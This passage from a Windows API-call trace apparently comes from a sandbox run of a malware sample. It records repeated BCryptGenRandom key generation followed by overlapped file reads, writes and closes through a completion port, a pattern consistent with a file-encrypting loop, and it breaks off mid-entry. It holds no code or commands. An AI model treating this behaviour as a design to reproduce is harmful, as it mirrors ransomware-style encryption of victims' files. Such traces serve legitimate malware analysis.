[0167.446] free (_Block=0x3e305b8) [0167.446] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.446] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.446] free (_Block=0x1fa91d0) [0167.446] free (_Block=0x1fa2ed8) [0167.446] free (_Block=0x1fa90b8) [0167.447] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.447] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.458] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x75f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0167.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.459] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8250, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.460] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x62c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0167.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.489] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x78e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.496] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.508] CloseHandle (hObject=0x3cc) returned 1 [0167.508] free (_Block=0x3df0008) [0167.509] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.522] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xb9c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0167.536] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.547] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7400, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.556] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.568] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.569] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.569] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.570] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.570] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.570] free (_Block=0x3e305b8) [0167.570] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.570] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.570] free (_Block=0x1fa91d0) [0167.570] free (_Block=0x1fa2ed8) [0167.570] free (_Block=0x1fa90b8) [0167.570] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0167.571] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.573] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4090, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.573] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.577] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x4590, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0167.577] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.616] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x76e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0167.616] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.616] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.617] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.617] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.617] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.617] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.617] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.618] free (_Block=0x3e305b8) [0167.618] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.618] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.618] free (_Block=0x1fa91d0) [0167.618] free (_Block=0x1fa2ed8) [0167.618] free (_Block=0x1fa90b8) [0167.618] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.618] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.620] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.620] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.621] CloseHandle (hObject=0x170) returned 1 [0167.621] free (_Block=0x1ff1e60) [0167.621] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.631] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.631] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.631] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.632] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.632] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.632] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.632] free (_Block=0x3e305b8) [0167.632] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.632] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.632] free (_Block=0x1fa91d0) [0167.632] free (_Block=0x1fa2ed8) [0167.632] free (_Block=0x1fa90b8) [0167.632] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.633] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.633] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.633] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.645] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x39f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.646] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.647] CloseHandle (hObject=0x170) returned 1 [0167.647] free (_Block=0x3df0008) [0167.647] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.656] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.656] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.657] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.657] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.657] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.657] free (_Block=0x3e305b8) [0167.657] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.657] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.658] free (_Block=0x1fa91d0) [0167.658] free (_Block=0x1fa2ed8) [0167.658] free (_Block=0x1fa90b8) [0167.658] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.658] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.660] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1d30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.660] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.660] CloseHandle (hObject=0x170) returned 1 [0167.661] free (_Block=0x3df0008) [0167.661] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.670] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.671] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.671] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.671] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.671] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.671] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.672] free (_Block=0x3e305b8) [0167.672] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.672] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.672] free (_Block=0x1fa91d0) [0167.672] free (_Block=0x1fa2ed8) [0167.672] free (_Block=0x1fa90b8) [0167.672] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.673] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.684] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x614, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.684] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.685] CloseHandle (hObject=0x170) returned 1 [0167.685] free (_Block=0x3df0008) [0167.685] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.695] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.695] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.695] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.696] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.696] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.696] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.696] free (_Block=0x3e305b8) [0167.696] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.696] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.697] free (_Block=0x1fa91d0) [0167.697] free (_Block=0x1fa2ed8) [0167.697] free (_Block=0x1fa90b8) [0167.697] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.697] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.708] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3380, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.709] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.710] CloseHandle (hObject=0x170) returned 1 [0167.710] free (_Block=0x3df0008) [0167.710] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.718] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.719] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.719] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.719] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.720] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.720] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.720] free (_Block=0x3e305b8) [0167.720] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.720] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.720] free (_Block=0x1fa91d0) [0167.720] free (_Block=0x1fa2ed8) [0167.720] free (_Block=0x1fa90b8) [0167.720] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.721] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.732] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x282c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.733] CloseHandle (hObject=0x170) returned 1 [0167.733] free (_Block=0x3df0008) [0167.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.742] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.742] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.742] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.743] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.743] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.743] free (_Block=0x3e305b8) [0167.743] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.743] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.743] free (_Block=0x1fa91d0) [0167.743] free (_Block=0x1fa2ed8) [0167.743] free (_Block=0x1fa90b8) [0167.743] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: 